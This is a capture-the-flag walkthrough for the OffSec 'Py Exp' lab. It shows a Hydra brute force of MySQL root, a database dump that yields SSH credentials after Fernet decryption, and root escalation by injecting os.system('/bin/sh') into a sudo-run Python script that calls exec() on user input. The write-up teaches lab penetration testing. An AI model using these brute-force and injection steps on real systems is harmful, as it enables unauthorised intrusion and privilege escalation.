Py Exp Walkthrough offsec

Room link https://portal.offsec.com/labs/play

Enumeration

I initiated an Rustscan scan and discovered open port.

PORT 80 is not open, so attack surface is drastically dropped for attackers.

MySQL service is running on port 3306. So let's do ENUMERATION on Mysql.

MYSQL BRUTE FORCE USING HYDRA.

hydra -l root -P /urs/share/wordlists/rockyou.txt mysql://192.168.160.118         

If using 'root' as the username was unsuccessful, our next step would be to attempt using 'admin' instead.

I got the password of the Mysql username root which is prettywomen.[root:prettywomen]

MYSQL ENUMERATION:

And login Mysql:

mysql -h 192.168.160.118 -u root -p 
show databases;        

use  data;
show tables;
select * from fernet;        

The data seemed to be base64 encoded, but when I tried to decode it, it yielded nothing. However, since I know that Fernet is a symmetric encryption mechanism, I used the key and ciphertext with an online decryptor and found a set of credentials.

I used the new credentials to access the SSH server.

username lucy: password wJ9`"Lemdv9[FEw-

ssh [email protected] -p 1337        

I got the flag in user.txt.

PRIVILEGE ESCALATION

i tired many different techniques was disappointed.

 cat /opt/exp.py        

uinput = raw_input('how are you?')

exec(uinput)

So, the plan is to run Python 2 with sudo to execute exp.py. Then, I will load a shell by adding import os; os.system("/bin/sh") to be executed by exp.py.

import pty;pty.spawn('/bin/bash')        

Thanks for visiting: